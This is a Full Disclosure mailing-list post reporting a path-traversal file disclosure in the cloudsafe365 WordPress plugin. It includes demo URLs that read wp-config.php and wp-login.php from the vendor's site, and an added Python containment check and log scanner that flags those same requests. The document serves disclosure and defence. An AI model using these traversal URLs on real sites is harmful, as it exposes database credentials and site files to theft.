Full Disclosure mailing list archives

Re: cloudsafe365 for wordpress: file disclosure


From: Henri Salo <henri () nerv fi>
Date: Tue, 28 Aug 2012 11:50:15 +0300

On Tue, Aug 28, 2012 at 10:29:46AM +0200, Jan van Niekerk wrote:
> This WordPress security plugin lets you read arbitrary files on the
> system.  Looking at the code, there will be plenty of stuff like this.
>
> Demo:
>
> http://www.cloudsafe365.com/wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php?file=../../../../../wp-config.php
>
> http://www.cloudsafe365.com/wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php?file=../../../../../wp-login.php
>
> Disclosure timeline:
>  * Today: visit wordpress.org
>  * Try to report bug
>  * System wants login
>  * Visit web site: vendor has no e-mail address and stupid one-liner
>    contact form and hidden name
>  * Stuff it, I'm not going to phone them

I can verify and report this. Could you list all the vulnerabilities you can find in the plugin? You can also contact the
plugins () wordpress org address in case you find vulnerabilities in WordPress plugins in the future.

- Henri Salo
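The report above shows a `file` parameter being joined into a filesystem path with no check on where the result ends up. As an added example (not the plugin's code, written in Python rather than PHP), this is the containment check such an editor endpoint needs, followed by a pass over constructed access-log lines that flags requests whose `file` value would have escaped the allow-listed directory; `BASE_DIR`, the log lines and the client IPs are assumptions.

```python
import posixpath
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# Hypothetical allow-listed directory the editor should be able to read from.
BASE_DIR = "/var/www/html/wp-content/plugins/cloudsafe365-for-wp/templates"


def resolve_user_file(base_dir: str, user_path: str) -> Optional[str]:
    """Return the normalised path if it stays under base_dir, else None.

    Normalising first collapses '..' and '//' so the comparison is made on the
    path the OS would actually open. In a real handler also pass the result
    through os.path.realpath so a symlink cannot point back outside base_dir.
    """
    if "\x00" in user_path:  # a NUL byte truncates the path in C file APIs
        return None
    base = posixpath.normpath(base_dir)
    # Strip a leading '/', otherwise join() would discard base_dir entirely.
    candidate = posixpath.normpath(posixpath.join(base, user_path.lstrip("/")))
    if candidate == base or candidate.startswith(base + "/"):
        return candidate
    return None


def flag_traversal_requests(log_lines: List[str], base_dir: str = BASE_DIR,
                            param: str = "file") -> List[Tuple[str, str]]:
    """Return (client_ip, file value) for cs365_edit.php requests whose
    parameter would have resolved outside base_dir (common log format)."""
    hits = []
    for line in log_lines:
        parts = line.split()          # field 6 is the request path
        if len(parts) < 7 or "cs365_edit.php" not in parts[6]:
            continue
        # parse_qs percent-decodes the value, so it is checked in decoded form.
        for value in parse_qs(urlsplit(parts[6]).query).get(param, []):
            if resolve_user_file(base_dir, value) is None:
                hits.append((parts[0], value))
    return hits


# Constructed access-log lines; the two traversal requests mirror the demo
# URLs from the report, the third is a legitimate in-directory read.
SAMPLE_LOG = [
    '192.0.2.10 - - [28/Aug/2012:10:29:46 +0200] "GET /wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php?file=../../../../../wp-config.php HTTP/1.1" 200 2711',
    '192.0.2.10 - - [28/Aug/2012:10:29:51 +0200] "GET /wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php?file=../../../../../wp-login.php HTTP/1.1" 200 1402',
    '198.51.100.7 - - [28/Aug/2012:10:30:02 +0200] "GET /wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php?file=header.tpl HTTP/1.1" 200 318',
]
```

Running `flag_traversal_requests(SAMPLE_LOG)` returns the two requests from 192.0.2.10 and leaves the `header.tpl` read alone.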

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

